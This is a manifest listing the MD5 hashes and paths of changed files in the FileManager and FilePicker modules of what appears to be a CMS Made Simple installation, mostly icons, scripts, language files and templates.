CHANGED :: c1498f30e2d620eef987c5e6ef0658b2 :: \modules\FileManager\icons\themes\default\extensions\16px\shtml.png
CHANGED :: 1a7dab77a3f6dfcd98912f43ee4ed74d :: \modules\FileManager\icons\themes\default\extensions\16px\sit.png
CHANGED :: fac95b875de34fe76e7ecfa9970caef0 :: \modules\FileManager\icons\themes\default\extensions\16px\sql.png
CHANGED :: 575bc48a2a870be509ed6d9421760e0d :: \modules\FileManager\icons\themes\default\extensions\16px\svg.png
CHANGED :: 90c9a13385688d8843a670c0e92ef3d4 :: \modules\FileManager\icons\themes\default\extensions\16px\swf.png
CHANGED :: bb71bb807a4602eee1de7477b493526b :: \modules\FileManager\icons\themes\default\extensions\16px\sxc.png
CHANGED :: c498ed11b5fe5b6e10a81367e89b3f1d :: \modules\FileManager\icons\themes\default\extensions\16px\sxi.png
CHANGED :: 36284450df12cd1950144e58f0a49da5 :: \modules\FileManager\icons\themes\default\extensions\16px\sxw.png
CHANGED :: d8897b1a7c8a0ab63d49c52c83a74c89 :: \modules\FileManager\icons\themes\default\extensions\16px\sys.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\16px\tar.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\16px\tgz.png
CHANGED :: 6277fc6587ad6623314c6e531ea43a4e :: \modules\FileManager\icons\themes\default\extensions\16px\tif.png
CHANGED :: 6277fc6587ad6623314c6e531ea43a4e :: \modules\FileManager\icons\themes\default\extensions\16px\tiff.png
CHANGED :: 857387aa6e136db43447bbcfdb90455d :: \modules\FileManager\icons\themes\default\extensions\16px\tmp.png
CHANGED :: 4c016df25442b82bbb994628193f1f45 :: \modules\FileManager\icons\themes\default\extensions\16px\tpl.png
CHANGED :: 0d6126a05f8c7742d264f9cc28f087df :: \modules\FileManager\icons\themes\default\extensions\16px\ttf.png
CHANGED :: eb70afff86da0f169fedecf62c06a7e6 :: \modules\FileManager\icons\themes\default\extensions\16px\txt.png
CHANGED :: 7a8f25c0e025f2d81e9a76b6b2909219 :: \modules\FileManager\icons\themes\default\extensions\16px\wav.png
CHANGED :: b5b09a618cb868dbc4c4d2a68542a482 :: \modules\FileManager\icons\themes\default\extensions\16px\wma.png
CHANGED :: b5b09a618cb868dbc4c4d2a68542a482 :: \modules\FileManager\icons\themes\default\extensions\16px\wmv.png
CHANGED :: 8df8a00ba8d17989f7eda33415a0a2ee :: \modules\FileManager\icons\themes\default\extensions\16px\wp.png
CHANGED :: 5cf9cd84f6651ab5f56d2dc5ed46bf88 :: \modules\FileManager\icons\themes\default\extensions\16px\xls.png
CHANGED :: 190d3164bc79bade34d49d440a32652a :: \modules\FileManager\icons\themes\default\extensions\16px\zip.png
CHANGED :: be2466e396c34e1cac62f12caec95b4b :: \modules\FileManager\icons\themes\default\extensions\32px\0.png
CHANGED :: 92ba24735f75cd165cebe00ef42ea0ba :: \modules\FileManager\icons\themes\default\extensions\32px\ace.png
CHANGED :: 9b8860dd3d19c5ccec8989cb0981d7f1 :: \modules\FileManager\icons\themes\default\extensions\32px\ai.png
CHANGED :: 7a8f25c0e025f2d81e9a76b6b2909219 :: \modules\FileManager\icons\themes\default\extensions\32px\aif.png
CHANGED :: 45122b3b46debde889449900fc490a83 :: \modules\FileManager\icons\themes\default\extensions\32px\ani.png
CHANGED :: d53f8d14dde2fc9ec4148d273b7ddfd9 :: \modules\FileManager\icons\themes\default\extensions\32px\asf.png
CHANGED :: ac44a82e401acd3dbcf4ff8dc3595af1 :: \modules\FileManager\icons\themes\default\extensions\32px\asp.png
CHANGED :: 28ca8ad824f9c3505cc57c9266acfb37 :: \modules\FileManager\icons\themes\default\extensions\32px\avi.png
CHANGED :: f3e3e3569fe26a864ea06f9749087ef9 :: \modules\FileManager\icons\themes\default\extensions\32px\bak.png
CHANGED :: ddf7a39083facc40eba2a1809a4fce13 :: \modules\FileManager\icons\themes\default\extensions\32px\bat.png
CHANGED :: 6d5edd9cc46f04200ca1726b99272f51 :: \modules\FileManager\icons\themes\default\extensions\32px\bin.png
CHANGED :: 5271b840024d6cf2b05ab8207055e79f :: \modules\FileManager\icons\themes\default\extensions\32px\bmp.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\32px\bz.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\32px\bz2.png
CHANGED :: 92ba24735f75cd165cebe00ef42ea0ba :: \modules\FileManager\icons\themes\default\extensions\32px\cab.png
CHANGED :: 1611892148a92627e4de1c078e54b1c5 :: \modules\FileManager\icons\themes\default\extensions\32px\cdr.png
CHANGED :: b982a4071ce27065b73123e10e814a9e :: \modules\FileManager\icons\themes\default\extensions\32px\cfg.png
CHANGED :: ddf7a39083facc40eba2a1809a4fce13 :: \modules\FileManager\icons\themes\default\extensions\32px\com.png
CHANGED :: f8cdd40893244c62190009a50d3eacc5 :: \modules\FileManager\icons\themes\default\extensions\32px\conf.png
CHANGED :: e63b8632ba47f55769484cf5ff007fbd :: \modules\FileManager\icons\themes\default\extensions\32px\cpt.png
CHANGED :: 9af6a6e5cdaca877bb7d02c063067686 :: \modules\FileManager\icons\themes\default\extensions\32px\css.png
CHANGED :: 45122b3b46debde889449900fc490a83 :: \modules\FileManager\icons\themes\default\extensions\32px\cur.png
CHANGED :: b4e304d75e08d7425e3b8d70b29372e4 :: \modules\FileManager\icons\themes\default\extensions\32px\dat.png
CHANGED :: 786d17dd6ed575642ef81aaeff1b4ec2 :: \modules\FileManager\icons\themes\default\extensions\32px\db.png
CHANGED :: f3c9b07e3f03c4bccee9e8fcbf365fa0 :: \modules\FileManager\icons\themes\default\extensions\32px\dcr.png
CHANGED :: 262c5478fbe3767179eb7389c6fd9fca :: \modules\FileManager\icons\themes\default\extensions\32px\dic.png
CHANGED :: 21aa9271d7cd305dd7baa2d6bac778f6 :: \modules\FileManager\icons\themes\default\extensions\32px\diff.png
CHANGED :: 844905a7d4073181589a0d0bbe66b092 :: \modules\FileManager\icons\themes\default\extensions\32px\dir.png
CHANGED :: 682aa9017b56b952f1bed3ebff88f24e :: \modules\FileManager\icons\themes\default\extensions\32px\dll.png
CHANGED :: 8cffe4a25678ee60f9576189bef142ab :: \modules\FileManager\icons\themes\default\extensions\32px\dmg.png
CHANGED :: f892f863743b7a0b19e684025f6972a4 :: \modules\FileManager\icons\themes\default\extensions\32px\doc.png
CHANGED :: f892f863743b7a0b19e684025f6972a4 :: \modules\FileManager\icons\themes\default\extensions\32px\docx.png
CHANGED :: dcc0006c47dd88c369dce903c8914cfc :: \modules\FileManager\icons\themes\default\extensions\32px\dwg.png
CHANGED :: d3f20b53bbe8506ad62d42988734888d :: \modules\FileManager\icons\themes\default\extensions\32px\edir.png
CHANGED :: 4a5d6550e2104d962c812c2a08ec60ab :: \modules\FileManager\icons\themes\default\extensions\32px\eml.png
CHANGED :: 6bc231629cf3fa087ff00bf10d277aee :: \modules\FileManager\icons\themes\default\extensions\32px\eps.png
CHANGED :: d14bb99058193d903496f1c79e3bd305 :: \modules\FileManager\icons\themes\default\extensions\32px\exe.png
CHANGED :: e52c87257b33699149751b94d9f1f69e :: \modules\FileManager\icons\themes\default\extensions\32px\fla.png
CHANGED :: 0d6126a05f8c7742d264f9cc28f087df :: \modules\FileManager\icons\themes\default\extensions\32px\fon.png
CHANGED :: abb23cb955761ae7088e51a4e67a7a26 :: \modules\FileManager\icons\themes\default\extensions\32px\gif.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\32px\gz.png
CHANGED :: bb6b49d84534a45b9017b40978e9a2b5 :: \modules\FileManager\icons\themes\default\extensions\32px\hqx.png
CHANGED :: 1d3d80ba1d2333543258b44ee1cd529f :: \modules\FileManager\icons\themes\default\extensions\32px\htm.png
CHANGED :: 1d3d80ba1d2333543258b44ee1cd529f :: \modules\FileManager\icons\themes\default\extensions\32px\html.png
CHANGED :: ef09a12e883549dcd0797f030dc4d811 :: \modules\FileManager\icons\themes\default\extensions\32px\ico.png
CHANGED :: 9b668773ce4f6f87d37843a837d4f5dd :: \modules\FileManager\icons\themes\default\extensions\32px\inc.png
CHANGED :: 2481bea55d5f8a544b0d3bc75e0fe019 :: \modules\FileManager\icons\themes\default\extensions\32px\ini.png
CHANGED :: 21f7ed7e570fad75420d2b482a6e61ee :: \modules\FileManager\icons\themes\default\extensions\32px\iso.png
CHANGED :: 2e49a8e00c8fb5179456c91bd7f33c2b :: \modules\FileManager\icons\themes\default\extensions\32px\jpeg.png
CHANGED :: 2e49a8e00c8fb5179456c91bd7f33c2b :: \modules\FileManager\icons\themes\default\extensions\32px\jpg.png
CHANGED :: 6dfb606e5cd7f8a4e8f37c3de0dfbe24 :: \modules\FileManager\icons\themes\default\extensions\32px\js.png
CHANGED :: f75a27a05c4214bc007ca0371288d36b :: \modules\FileManager\icons\themes\default\extensions\32px\log.png
CHANGED :: a358a26cb1d44da190d2f0d944dc26fc :: \modules\FileManager\icons\themes\default\extensions\32px\m3u.png
CHANGED :: 4398c5642803dcc81bc468c49ee3870e :: \modules\FileManager\icons\themes\default\extensions\32px\mdb.png
CHANGED :: 562ade1efa9efdcc362144771797b0ec :: \modules\FileManager\icons\themes\default\extensions\32px\mid.png
CHANGED :: 562ade1efa9efdcc362144771797b0ec :: \modules\FileManager\icons\themes\default\extensions\32px\midi.png
CHANGED :: a5041425aa02410c2f5fb2daf3c535d2 :: \modules\FileManager\icons\themes\default\extensions\32px\mov.png
CHANGED :: a358a26cb1d44da190d2f0d944dc26fc :: \modules\FileManager\icons\themes\default\extensions\32px\mp3.png
CHANGED :: 7de0ce3dc45fb518051f6c17ea320d0a :: \modules\FileManager\icons\themes\default\extensions\32px\mpeg.png
CHANGED :: 7de0ce3dc45fb518051f6c17ea320d0a :: \modules\FileManager\icons\themes\default\extensions\32px\mpg.png
CHANGED :: 2a159d3ecd4832a136cf0b5b300192f8 :: \modules\FileManager\icons\themes\default\extensions\32px\nfo.png
CHANGED :: b222cfba97fc8f2aa244d5d6f1b741af :: \modules\FileManager\icons\themes\default\extensions\32px\odb.png
CHANGED :: 5fb9375b9e42efd1460f472ea3e25117 :: \modules\FileManager\icons\themes\default\extensions\32px\odc.png
CHANGED :: 28db25b25ba4afe4e3132885ddc1ab22 :: \modules\FileManager\icons\themes\default\extensions\32px\odf.png
CHANGED :: 61bdbf387262ec7d1a98ba0e864a5cbf :: \modules\FileManager\icons\themes\default\extensions\32px\odg.png
CHANGED :: bc9d2aab4445b41651f409aa2ebf433b :: \modules\FileManager\icons\themes\default\extensions\32px\odm.png
CHANGED :: 8a81b2fa9cc59abb4ebcd0cdde5be79f :: \modules\FileManager\icons\themes\default\extensions\32px\odp.png
CHANGED :: 1699d148860680f2680fbca930d2882d :: \modules\FileManager\icons\themes\default\extensions\32px\ods.png
CHANGED :: 7276b2410b996ba5ff6dac58414b2ab4 :: \modules\FileManager\icons\themes\default\extensions\32px\odt.png
CHANGED :: c33a79e76e3c6e0dd11c158a332337d8 :: \modules\FileManager\icons\themes\default\extensions\32px\ogg.png
CHANGED :: cd6d2fbe6350fd472cb3c245d90e5f67 :: \modules\FileManager\icons\themes\default\extensions\32px\otg.png
CHANGED :: 9f68cdc6aabb2b13af05596160010312 :: \modules\FileManager\icons\themes\default\extensions\32px\oth.png
CHANGED :: 05f53942bc2ef058abaf24ce2603efa3 :: \modules\FileManager\icons\themes\default\extensions\32px\otp.png
CHANGED :: 550fbcd6407826c5a71f0f52b060d35f :: \modules\FileManager\icons\themes\default\extensions\32px\ots.png
CHANGED :: 1659b84849b477bec8cfe70e7c4435f7 :: \modules\FileManager\icons\themes\default\extensions\32px\ott.png
CHANGED :: a5b0f19db302e724916d405de05f48a3 :: \modules\FileManager\icons\themes\default\extensions\32px\patch.png
CHANGED :: 32145081819a185ba662cce528130657 :: \modules\FileManager\icons\themes\default\extensions\32px\pdf.png
CHANGED :: c5f1fb47249a90649fe3583d16e7c8ad :: \modules\FileManager\icons\themes\default\extensions\32px\php.png
CHANGED :: d756992af6d90ee892938a7909fea6a3 :: \modules\FileManager\icons\themes\default\extensions\32px\php3.png
CHANGED :: c5f1fb47249a90649fe3583d16e7c8ad :: \modules\FileManager\icons\themes\default\extensions\32px\phtml.png
CHANGED :: 99c215b200a0f9abc9e5a841345fd7c4 :: \modules\FileManager\icons\themes\default\extensions\32px\pl.png
CHANGED :: 43b266dbb99fce6f7110cf97a847a8f8 :: \modules\FileManager\icons\themes\default\extensions\32px\png.png
CHANGED :: e583e977d26e73bc8fcafa3e921a7c8f :: \modules\FileManager\icons\themes\default\extensions\32px\pps.png
CHANGED :: 18ce9548f6fc3bc16812f59b05450921 :: \modules\FileManager\icons\themes\default\extensions\32px\ppt.png
CHANGED :: 152ad09bf09c1f615b26f1d1914d1f75 :: \modules\FileManager\icons\themes\default\extensions\32px\psd.png
CHANGED :: 7f98c9d6156a7c2c0fd7450ac9596d55 :: \modules\FileManager\icons\themes\default\extensions\32px\pwl.png
CHANGED :: a5041425aa02410c2f5fb2daf3c535d2 :: \modules\FileManager\icons\themes\default\extensions\32px\qt.png
CHANGED :: b7cb9f8247e1dd13518441ec7a2a2bed :: \modules\FileManager\icons\themes\default\extensions\32px\ra.png
CHANGED :: b7cb9f8247e1dd13518441ec7a2a2bed :: \modules\FileManager\icons\themes\default\extensions\32px\ram.png
CHANGED :: 92ba24735f75cd165cebe00ef42ea0ba :: \modules\FileManager\icons\themes\default\extensions\32px\rar.png
CHANGED :: d95f282ea8d20427919653c7c364f6bd :: \modules\FileManager\icons\themes\default\extensions\32px\reg.png
CHANGED :: d78d38498903c8bd17a356dfd79c50db :: \modules\FileManager\icons\themes\default\extensions\32px\rpm.png
CHANGED :: 4bdb0feb99fd618c0bb3b0c9ffe001d4 :: \modules\FileManager\icons\themes\default\extensions\32px\rtf.png
CHANGED :: 058361a637258394244c58bc87cf71ea :: \modules\FileManager\icons\themes\default\extensions\32px\sh.png
CHANGED :: c1498f30e2d620eef987c5e6ef0658b2 :: \modules\FileManager\icons\themes\default\extensions\32px\shtml.png
CHANGED :: 1a7dab77a3f6dfcd98912f43ee4ed74d :: \modules\FileManager\icons\themes\default\extensions\32px\sit.png
CHANGED :: fac95b875de34fe76e7ecfa9970caef0 :: \modules\FileManager\icons\themes\default\extensions\32px\sql.png
CHANGED :: 575bc48a2a870be509ed6d9421760e0d :: \modules\FileManager\icons\themes\default\extensions\32px\svg.png
CHANGED :: 90c9a13385688d8843a670c0e92ef3d4 :: \modules\FileManager\icons\themes\default\extensions\32px\swf.png
CHANGED :: bb71bb807a4602eee1de7477b493526b :: \modules\FileManager\icons\themes\default\extensions\32px\sxc.png
CHANGED :: c498ed11b5fe5b6e10a81367e89b3f1d :: \modules\FileManager\icons\themes\default\extensions\32px\sxi.png
CHANGED :: 36284450df12cd1950144e58f0a49da5 :: \modules\FileManager\icons\themes\default\extensions\32px\sxw.png
CHANGED :: d8897b1a7c8a0ab63d49c52c83a74c89 :: \modules\FileManager\icons\themes\default\extensions\32px\sys.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\32px\tar.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\32px\tgz.png
CHANGED :: 6277fc6587ad6623314c6e531ea43a4e :: \modules\FileManager\icons\themes\default\extensions\32px\tif.png
CHANGED :: 6277fc6587ad6623314c6e531ea43a4e :: \modules\FileManager\icons\themes\default\extensions\32px\tiff.png
CHANGED :: 857387aa6e136db43447bbcfdb90455d :: \modules\FileManager\icons\themes\default\extensions\32px\tmp.png
CHANGED :: 4c016df25442b82bbb994628193f1f45 :: \modules\FileManager\icons\themes\default\extensions\32px\tpl.png
CHANGED :: 0d6126a05f8c7742d264f9cc28f087df :: \modules\FileManager\icons\themes\default\extensions\32px\ttf.png
CHANGED :: eb70afff86da0f169fedecf62c06a7e6 :: \modules\FileManager\icons\themes\default\extensions\32px\txt.png
CHANGED :: 7a8f25c0e025f2d81e9a76b6b2909219 :: \modules\FileManager\icons\themes\default\extensions\32px\wav.png
CHANGED :: b5b09a618cb868dbc4c4d2a68542a482 :: \modules\FileManager\icons\themes\default\extensions\32px\wma.png
CHANGED :: b5b09a618cb868dbc4c4d2a68542a482 :: \modules\FileManager\icons\themes\default\extensions\32px\wmv.png
CHANGED :: 8df8a00ba8d17989f7eda33415a0a2ee :: \modules\FileManager\icons\themes\default\extensions\32px\wp.png
CHANGED :: 5cf9cd84f6651ab5f56d2dc5ed46bf88 :: \modules\FileManager\icons\themes\default\extensions\32px\xls.png
CHANGED :: 190d3164bc79bade34d49d440a32652a :: \modules\FileManager\icons\themes\default\extensions\32px\zip.png
CHANGED :: bbd39365d1f817701d9e8b4c3526061d :: \modules\FileManager\images\edit_pencil.gif
CHANGED :: f6d00ecae5703297b1dc3b93c0d9da81 :: \modules\FileManager\images\icon.gif
CHANGED :: f3e56e4a1306c67c6cec07fd74dd306a :: \modules\FileManager\images\icon.png
CHANGED :: a7ef7292d76e194981dc4bbc6d2e9997 :: \modules\FileManager\js\jquery-file-upload\jquery.fileupload.js
CHANGED :: 487d5e5434beb03193861df573f01a93 :: \modules\FileManager\js\jquery-file-upload\jquery.iframe-transport.js
CHANGED :: 3be7161e731b283f3041203fbb807ce9 :: \modules\FileManager\js\jquery-file-upload\package.json
CHANGED :: 2165b99c89c8431e7165530ccb5f89fb :: \modules\FileManager\js\jquery-file-upload\progressbar.gif
CHANGED :: 06fca9ef95fcd664b53fd10681b94a5d :: \modules\FileManager\js\jquery-file-upload\vendor\jquery.ui.widget.js
CHANGED :: 1e9c6d3f4fb0e040948add2e64aa7952 :: \modules\FileManager\js\jqueryrotate\jQueryRotate-2.2.min.js
CHANGED :: 57ca1a2085d82f0574e3ef740b9a5ead :: \modules\FileManager\js\jrac\images\loading.gif
CHANGED :: f417d15fb2e32a601ce6b866da9ef880 :: \modules\FileManager\js\jrac\images\viewport_background.gif
CHANGED :: 6d8eed59110cc847fcbac38f9cc948e7 :: \modules\FileManager\js\jrac\jquery.jrac.js
CHANGED :: c3ba9da55894be37f5a3d4a4f2333f01 :: \modules\FileManager\js\jrac\style.jrac.css
CHANGED :: 6a18edab22f659bac44d24cbd273c98d :: \modules\FileManager\lang\en_US.php
CHANGED :: 56ae77850b464e33d77a3d05f7787909 :: \modules\FileManager\lang\ext\ar_AR.php
CHANGED :: b3984424f72c00e15b41c2eed031d878 :: \modules\FileManager\lang\ext\ca_ES.php
CHANGED :: eda3175260d265fb9a47147538e3d076 :: \modules\FileManager\lang\ext\cs_CZ.php
CHANGED :: 1cf5863d40942deaf88eb7a812d8d1bd :: \modules\FileManager\lang\ext\da_DK.php
CHANGED :: 7eb787c422b7977faf0fd3bf22999f80 :: \modules\FileManager\lang\ext\de_DE.php
CHANGED :: 25952a2e853411b81824d49fdb49febd :: \modules\FileManager\lang\ext\en_CY.php
CHANGED :: 39abc6d3d53a6e9d5ac7300d53568dc6 :: \modules\FileManager\lang\ext\es_ES.php
CHANGED :: f018a055f8c8f30668f4a45d8ecab201 :: \modules\FileManager\lang\ext\et_EE.php
CHANGED :: c7466eadbf8070eddf2c81a3d6b740d9 :: \modules\FileManager\lang\ext\fa_FA.php
CHANGED :: c7466eadbf8070eddf2c81a3d6b740d9 :: \modules\FileManager\lang\ext\fa_IR.php
CHANGED :: 296ba0df5deba3f7ba1dd7133dc449a4 :: \modules\FileManager\lang\ext\fi_FI.php
CHANGED :: 10ba73de6f387c74d9930ac90da995c6 :: \modules\FileManager\lang\ext\fr_FR.php
CHANGED :: 75ff1d2111dd42b7bb0a3f567fdb07b8 :: \modules\FileManager\lang\ext\hr_HR.php
CHANGED :: 801e23148b3df669f5815248a033faef :: \modules\FileManager\lang\ext\hu_HU.php
CHANGED :: 0b49fd7c449685a71afb29346c5000d8 :: \modules\FileManager\lang\ext\it_IT.php
CHANGED :: 06d03b3e9af40a1de9931dd34f47ccc2 :: \modules\FileManager\lang\ext\iw_IL.php
CHANGED :: 3b2c2bd0a8944d632ea35af5c2d33456 :: \modules\FileManager\lang\ext\ja_JP.php
CHANGED :: 627956eb179ecda605074a245378ad83 :: \modules\FileManager\lang\ext\lt_LT.php
CHANGED :: deb1551f0f903c2101624498f4521389 :: \modules\FileManager\lang\ext\nb_NO.php
CHANGED :: a7648c8127034c7f80e16201de367536 :: \modules\FileManager\lang\ext\nl_NL.php
CHANGED :: bb5ceda86140242b40b811a87de0d284 :: \modules\FileManager\lang\ext\pl_PL.php
CHANGED :: f0c7bf337f870e37a8e6ec830686a27b :: \modules\FileManager\lang\ext\pt_BR.php
CHANGED :: d7b6ef5b8607ee19a729dba899e94a4f :: \modules\FileManager\lang\ext\pt_PT.php
CHANGED :: 8b521feba36b364c9bbc5c703b2e6d17 :: \modules\FileManager\lang\ext\ro_RO.php
CHANGED :: 721cf1777e4afaa0d55679b1b219d1f7 :: \modules\FileManager\lang\ext\ru_RU.php
CHANGED :: e7f9dac8465d9fa96a07d9a7f69031d0 :: \modules\FileManager\lang\ext\sk_SK.php
CHANGED :: a924c4bde53772f16a517642f23ce5eb :: \modules\FileManager\lang\ext\sl_SI.php
CHANGED :: a115f47a4c45b5d63bf7bb2441a077f6 :: \modules\FileManager\lang\ext\sr_YU.php
CHANGED :: 2ba43148e091f000557d4c0e0854f7b4 :: \modules\FileManager\lang\ext\sv_SE.php
CHANGED :: f4ec5c8695e8a751e968e3d612f0dc68 :: \modules\FileManager\lang\ext\tr_TR.php
CHANGED :: ec2c59267da8f32964372612f909fc5a :: \modules\FileManager\lang\ext\uk_UA.php
CHANGED :: d662249183ade2eec8b33116218b2b7b :: \modules\FileManager\lang\ext\zh_TW.php
CHANGED :: 3a8a0b81e062431fc314ec4581b5ed8c :: \modules\FileManager\lib\class.filemanager_utils.php
CHANGED :: 6420294a9cca26d0a9ff03f6fa147b78 :: \modules\FileManager\lib\class.imageEditor.php
CHANGED :: 55980c8977fdbe2299f321757afc73f1 :: \modules\FileManager\lib\class.jquery_upload_handler.php
CHANGED :: d0c0b6db745a0f017d729583a63981cd :: \modules\FileManager\method.install.php
CHANGED :: 6569ec1314522b589d5cf2cb1e3dc94e :: \modules\FileManager\method.uninstall.php
CHANGED :: b0831dbf7db77e2a1a8b6e54ee4faeb2 :: \modules\FileManager\method.upgrade.php
CHANGED :: 876b3de4ce9c0e94c36db49d5603fcfb :: \modules\FileManager\templates\changelog.tpl
CHANGED :: 3c90d39ff33f6b78193eb602485084c8 :: \modules\FileManager\templates\chmoddir.tpl
CHANGED :: 33d12585750b7b4ad6112ec3ac4db318 :: \modules\FileManager\templates\chmodfile.tpl
CHANGED :: 7180c9209d54f8d5d25682bec6eb60cf :: \modules\FileManager\templates\chmodfilewin.tpl
CHANGED :: fe21989f8298232aa45e1f32ac0b890e :: \modules\FileManager\templates\confirmdeltree.tpl
CHANGED :: 009334740ef48f7cfbdaf17098bb59ba :: \modules\FileManager\templates\copy.tpl
CHANGED :: f566c17d3b9992d7aff31a94253df375 :: \modules\FileManager\templates\delete.tpl
CHANGED :: 6284117b96b431c7570ea7c8efb21970 :: \modules\FileManager\templates\dropzone.tpl
CHANGED :: 8d1841657124c65964d405912ccc144b :: \modules\FileManager\templates\filemanager.tpl
CHANGED :: 359fc088133b1a1a3af495a3fd3a539d :: \modules\FileManager\templates\filepicker.tpl
CHANGED :: c39868da24e05aa5ff8ad375ac850c6c :: \modules\FileManager\templates\filerotate.tpl
CHANGED :: 1906edbec93fe1f11796b4ba759bb68c :: \modules\FileManager\templates\filethumbnail.tpl
CHANGED :: ce54a7e39762df112ded9d5adb8ae1ad :: \modules\FileManager\templates\fmpath.tpl
CHANGED :: 411e0a77d597c4df46dff6944a94df0d :: \modules\FileManager\templates\modetable.tpl
CHANGED :: e992c936e95bc05bdcc5a372d70e2e5c :: \modules\FileManager\templates\move.tpl
CHANGED :: 9c5de53d2544b540b76203f95e9d786a :: \modules\FileManager\templates\newdir.tpl
CHANGED :: ae7578493636332473830b630ffc6861 :: \modules\FileManager\templates\pie.tpl
CHANGED :: 3469190d0bf40c686ac8123d5b52fe62 :: \modules\FileManager\templates\renamefile.tpl
CHANGED :: e3e51b47fa6846916b4245adcc1d5a62 :: \modules\FileManager\templates\settings.tpl
CHANGED :: bd7569cbd70fda7778bb6880f6694aa1 :: \modules\FileManager\templates\uploadview.tpl
CHANGED :: c352cbd6ee2e6834d4c51cd8d9ed2759 :: \modules\FileManager\untgz.php
CHANGED :: 96c0f31cb45a3dbe6e779f1a54f3a6fc :: \modules\FileManager\uploadview.php
CHANGED :: 37380d7804ece0d61cb85b1d4f2c0cb5 :: \modules\FilePicker\action.ajax_cmd.php
CHANGED :: df9b9e2748c5185e25a8b0efca400c80 :: \modules\FilePicker\action.defaultadmin.php
CHANGED :: ab684d48029bd64504ae8311b25fd1b7 :: \modules\FilePicker\action.delete_profile.php
CHANGED :: 6ca1f90eb2a2205721df5e4cdc4198c5 :: \modules\FilePicker\action.edit_profile.php
CHANGED :: eea7ee0f52c78c7f4f22915265e12d9c :: \modules\FilePicker\action.filepicker.php
CHANGED :: af3ee9347be89d68304c18234aa28660 :: \modules\FilePicker\action.select.php
CHANGED :: 571255d3496ae3e1db1a307ad497a10a :: \modules\FilePicker\action.setdflt_profile.php
CHANGED :: a4e98e5fe5cd1fde2030dad5a3778b06 :: \modules\FilePicker\action.upload.php
CHANGED :: 4366afa6fee7c41e35e1b4e496bdce95 :: \modules\FilePicker\FilePicker.module.php
CHANGED :: 6f27917c558c5d3e2f7b8cb8293bfbd4 :: \modules\FilePicker\js\ext\jquery.fileupload-audio.js
CHANGED :: 228ef1e6e7847432f339f5a48fed98cf :: \modules\FilePicker\js\ext\jquery.fileupload-image.js
CHANGED :: 65894863d98e39a43966198e22d4976d :: \modules\FilePicker\js\ext\jquery.fileupload-jquery-ui.js
CHANGED :: c92f97e488bb0f380961f4beb88cbd1c :: \modules\FilePicker\js\ext\jquery.fileupload-process.js
CHANGED :: 8ec49f00acfb70790fd3d2f8dc0d80d8 :: \modules\FilePicker\js\ext\jquery.fileupload-ui.js
CHANGED :: b4f0da4b2581a880d389fc9832540c81 :: \modules\FilePicker\js\ext\jquery.fileupload-validate.js
CHANGED :: 1aa763ed4027ae2831b8ebad27f7bf23 :: \modules\FilePicker\js\ext\jquery.fileupload-video.js
CHANGED :: 2340c47a593a072a518787317fc0b05b :: \modules\FilePicker\js\ext\jquery.fileupload.js
CHANGED :: e52b800058f277ee05d3389db247cd25 :: \modules\FilePicker\lang\en_US.php
CHANGED :: 36979a3ba2e604384b5286b01aee388f :: \modules\FilePicker\lang\ext\da_DK.php
CHANGED :: b533dfd432dd3ccc5d184f111ca10203 :: \modules\FilePicker\lang\ext\fr_FR.php
CHANGED :: 741aedd683aeeb0302994d1373d65757 :: \modules\FilePicker\lang\ext\it_IT.php
CHANGED :: 6ddbf13df1c08d7d67d31650e1ba80bf :: \modules\FilePicker\lang\ext\nb_NO.php
CHANGED :: 3cf5864b859ccebbf95b063a14a5cfe0 :: \modules\FilePicker\lang\ext\ru_RU.php
CHANGED :: dd19898f310470a462cb757a50f49d4d :: \modules\FilePicker\lang\ext\tr_TR.php
CHANGED :: f49e0f1a1a07319bfb8703406c80c7b7 :: \modules\FilePicker\lang\ext\uk_UA.php
CHANGED :: 09d8cd2dbf11a3fa20cdee90187688d2 :: \modules\FilePicker\lib\class.jquery_upload_handler.php
CHANGED :: 6dfc1f55a6345128301ba00fa92e86fc :: \modules\FilePicker\lib\class.PathAssistant.php
CHANGED :: 2ab43920305968f49a0a96853766270b :: \modules\FilePicker\lib\class.Profile.php
CHANGED :: 172e98126e30640abd8a27d9e7238cd4 :: \modules\FilePicker\lib\class.ProfileDAO.php
CHANGED :: 5c2ebfe1f834043aa2c0aaeec3c7b400 :: \modules\FilePicker\lib\class.TemporaryInstanceStorage.php
CHANGED :: 4e7b7203e641ae37bb1323dc3ccb71bf :: \modules\FilePicker\lib\class.TemporaryProfileStorage.php
CHANGED :: 6fe228965aeec918d032f9758e3c1970 :: \modules\FilePicker\lib\class.UploadHandler.php
CHANGED :: ce5afb684cad4e8b4094c5baba70008e :: \modules\FilePicker\lib\css\filepicker.css
CHANGED :: 0a89d10dfcf2bccf25925eaea3a2d3a5 :: \modules\FilePicker\lib\css\filepicker.min.css
CHANGED :: 46fd128bd82f36a5d664cd8d684c7493 :: \modules\FilePicker\lib\fonts\cmsms-filepicker.eot
CHANGED :: 41404b8d40df9ad1ae5df5a4d9b04d16 :: \modules\FilePicker\lib\fonts\cmsms-filepicker.svg
CHANGED :: 6e582127a2968ef92020fcc1446e08bc :: \modules\FilePicker\lib\fonts\cmsms-filepicker.ttf
CHANGED :: ed3d3307cbd9084448c40e70ae3bbe41 :: \modules\FilePicker\lib\fonts\cmsms-filepicker.woff
CHANGED :: 8ef6940626da4b5977ffa5483b0b2558 :: \modules\FilePicker\lib\images\cmsmslink.gif
CHANGED :: 225471a77db57ec491fb3112a7f6cfb2 :: \modules\FilePicker\lib\images\dir.gif
CHANGED :: 21395c35c65c2666c3efd6ec05654246 :: \modules\FilePicker\lib\js\cmsms_filebrowser\filebrowser.js
CHANGED :: 07d4639a7d81f18c264e595c8ba822c0 :: \modules\FilePicker\method.install.php
CHANGED :: f2f1ef713276f6f30ac680ad9b3ee53b :: \modules\FilePicker\method.uninstall.php
CHANGED :: a595cd23497acab8c61b0b8c11e91802 :: \modules\FilePicker\templates\contentblock.tpl
CHANGED :: ffc956d3c023373865ba12c047d15337 :: \modules\FilePicker\templates\defaultadmin.tpl
